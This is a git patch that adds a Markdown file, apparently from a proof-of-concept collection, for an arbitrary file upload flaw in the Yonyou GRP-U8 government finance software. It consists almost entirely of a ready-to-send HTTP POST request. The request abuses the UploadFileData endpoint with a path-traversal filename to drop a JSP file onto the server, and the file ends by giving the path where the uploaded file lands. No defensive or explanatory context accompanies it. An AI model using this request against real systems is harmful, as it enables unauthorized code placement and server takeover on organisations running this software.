From d592a823eaeaeac0eb7906e1c34f8110db91d87f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 28 Apr 2024 21:09:54 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BGRP-U8-UploadFileDat?= =?UTF-8?q?a=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
用友GRP-U8-UploadFileData任意文件上传.md | 34 ++++++++++++++++++++++++
1 file changed, 34 insertions(+)
create mode 100644 用友GRP-U8-UploadFileData任意文件上传.md
diff --git a/用友GRP-U8-UploadFileData任意文件上传.md b/用友GRP-U8-UploadFileData任意文件上传.md
new file mode 100644
index 0000000..b396ecf
--- /dev/null
+++ b/用友GRP-U8-UploadFileData任意文件上传.md
@@ -0,0 +1,34 @@
+## 用友GRP-U8-UploadFileData任意文件上传
+
+
+## poc
+```
+POST /UploadFileData?action=upload_file&filename=../.jtstpm.jsp HTTP/1.0
+Host: xxxxxx
+Connection: close
+Content-Length: 327
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzassocxz
+Cookie: JSESSIONID=0333BDE70A73627168772D5C50956A74
+Dfpajaxreq: 1.0
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+------WebKitFormBoundaryzassocxz
+Content-Disposition: form-data; name="upload"; filename="jtstpm.jsp"
+Content-Type: application/octet-stream
+
+11111
+------WebKitFormBoundaryzassocxz
+Content-Disposition: form-data; name="submit"
+
+submit
+------WebKitFormBoundaryzassocxz--
+```
+
+文件路径 /R9iPortal/jtstpm.jsp